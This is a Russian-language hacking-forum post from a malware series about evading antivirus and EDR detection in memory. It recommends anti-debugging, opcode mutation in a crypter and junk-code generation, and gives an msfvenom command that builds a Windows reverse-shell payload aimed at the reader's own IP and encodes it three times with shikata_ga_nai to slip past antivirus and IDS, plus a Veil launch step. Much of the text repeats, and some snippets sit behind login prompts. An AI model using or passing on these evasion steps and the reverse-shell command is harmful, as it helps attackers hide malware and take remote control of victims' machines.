Про детект в памяти. Ничего не поделаешь и это неизбежно)
Всем привет!
Хотел ещё добавить:
Вот в этой теме:Обход EDRs.Последняя тема цикла | Цикл статей "Изучение вредоносных программ"
Был поднят вопрос детекта памяти, да можно использовать такие штуки:Открываем врата ада | Цикл статей "Изучение вредоносных программ"
Но тем не менее важно что-бы сама нагрузка тоже не палилась, в теме про EDR про это сказано.
Также неплохо, при проектировании вашего основного зверька или полезной нагрузки учитывать методы антиотладки и морфинга самой полезной нагрузки.
Это можно делать прям в памяти, перед запуском, вот например я использовал такой механизм в крипторе:
На вход подаётся бинарный код, на выходе по возможности мутируются, т.е. меняются опкоды на аналоги.
Уже какие-то антивирусы могут не детектить, всё зависит от настройки эвристики антивируса.
Также если у вас есть исходный код нагрузки, можете использовать различные приёмы генерации мусорного кода, например вот:
Техники задержек и прочее как в темах Черпаем силы в антиотладке | Цикл статей "Изучение вредоносных программ" и Уменьшение вероятности детекта зверька | Цикл статей "Изучение вредоносных программ"
Если вы-же генерируете нагрузку фреймворками, то обязательно включайте опции обфускации и защиты, вот примеры:
Здесь -e x86/shikata_ga_nai указывает использовать кодировщик shikata_ga_nai, а -i 3 указывает применить кодировщик 3 раза.
shikata_ga_nai — это один из наиболее популярных кодировщиков в Metasploit. Его название происходит от японского выражения "仕方がない", что можно перевести как "ничего не поделаешь" или "это неизбежно".
В контексте Metasploit, shikata_ga_nai используется для обфускации шеллкода с целью избежать обнаружения антивирусами или IDS/IPS системами. Этот кодировщик использует полиморфную технику, что означает, что каждый раз, когда он используется, он генерирует уникальный обфусцированный шеллкод, даже если исходный шеллкод остается неизменным.
Вот некоторые особенности shikata_ga_nai:
— это инструмент для создания обфусцированных payloads, чтобы избежать обнаружения.
Итог:
Для обхода детекта в памяти и детекта по поведению, сама нагрузка и итоговый зверек должен быть чистым.
Все остальные инструменты помогают сделать запуск зверька скрытым, но не позволяют избежать поведение связанное с запущенным вредоносным кодом.)
Хотел ещё добавить:
Вот в этой теме:Обход EDRs.Последняя тема цикла | Цикл статей "Изучение вредоносных программ"
Был поднят вопрос детекта памяти, да можно использовать такие штуки:Открываем врата ада | Цикл статей "Изучение вредоносных программ"
Но тем не менее важно что-бы сама нагрузка тоже не палилась, в теме про EDR про это сказано.
Также неплохо, при проектировании вашего основного зверька или полезной нагрузки учитывать методы антиотладки и морфинга самой полезной нагрузки.
Это можно делать прям в памяти, перед запуском, вот например я использовал такой механизм в крипторе:
Чтобы увидеть нужно авторизоваться или зарегистрироваться.
На вход подаётся бинарный код, на выходе по возможности мутируются, т.е. меняются опкоды на аналоги.
Уже какие-то антивирусы могут не детектить, всё зависит от настройки эвристики антивируса.
Также если у вас есть исходный код нагрузки, можете использовать различные приёмы генерации мусорного кода, например вот:
Чтобы увидеть нужно авторизоваться или зарегистрироваться.
Техники задержек и прочее как в темах Черпаем силы в антиотладке | Цикл статей "Изучение вредоносных программ" и Уменьшение вероятности детекта зверька | Цикл статей "Изучение вредоносных программ"
Если вы-же генерируете нагрузку фреймворками, то обязательно включайте опции обфускации и защиты, вот примеры:
1. Metasploit
Metasploit также предоставляет различные кодировщики для обфускации payload. Например:
C:
msfvenom -p windows/shell_reverse_tcp LHOST=ВАШ_IP LPORT=4444 -f c -e x86/shikata_ga_nai -i 3Здесь -e x86/shikata_ga_nai указывает использовать кодировщик shikata_ga_nai, а -i 3 указывает применить кодировщик 3 раза.
shikata_ga_nai — это один из наиболее популярных кодировщиков в Metasploit. Его название происходит от японского выражения "仕方がない", что можно перевести как "ничего не поделаешь" или "это неизбежно".
В контексте Metasploit, shikata_ga_nai используется для обфускации шеллкода с целью избежать обнаружения антивирусами или IDS/IPS системами. Этот кодировщик использует полиморфную технику, что означает, что каждый раз, когда он используется, он генерирует уникальный обфусцированный шеллкод, даже если исходный шеллкод остается неизменным.
Вот некоторые особенности shikata_ga_nai:
- Полиморфизм: Каждое обфусцирование уникально.
- Размер: Кодировщик может генерировать шеллкоды разного размера, что может быть полезно для эксплуатации различных уязвимостей.
- Динамическая настройка ключа: shikata_ga_nai использует динамически изменяющийся ключ для кодирования данных, что делает его сложнее для статического анализа.
- Регистровая независимость: Кодировщик спроектирован таким образом, чтобы не зависеть от конкретных регистров, что увеличивает вероятность успешного выполнения шеллкода в различных условиях.
2. Veil
Чтобы увидеть нужно авторизоваться или зарегистрироваться.
Создание и морфинг payload:
После установки Veil, запустите его:
C:
Veil.pyИтог:
Для обхода детекта в памяти и детекта по поведению, сама нагрузка и итоговый зверек должен быть чистым.
Все остальные инструменты помогают сделать запуск зверька скрытым, но не позволяют избежать поведение связанное с запущенным вредоносным кодом.)
- Следующая страница цикла: Огромная база исходников современных вирусов для разных платформ
- Предыдущая статья цикла: Про Endpoint Detection and Response (EDR)
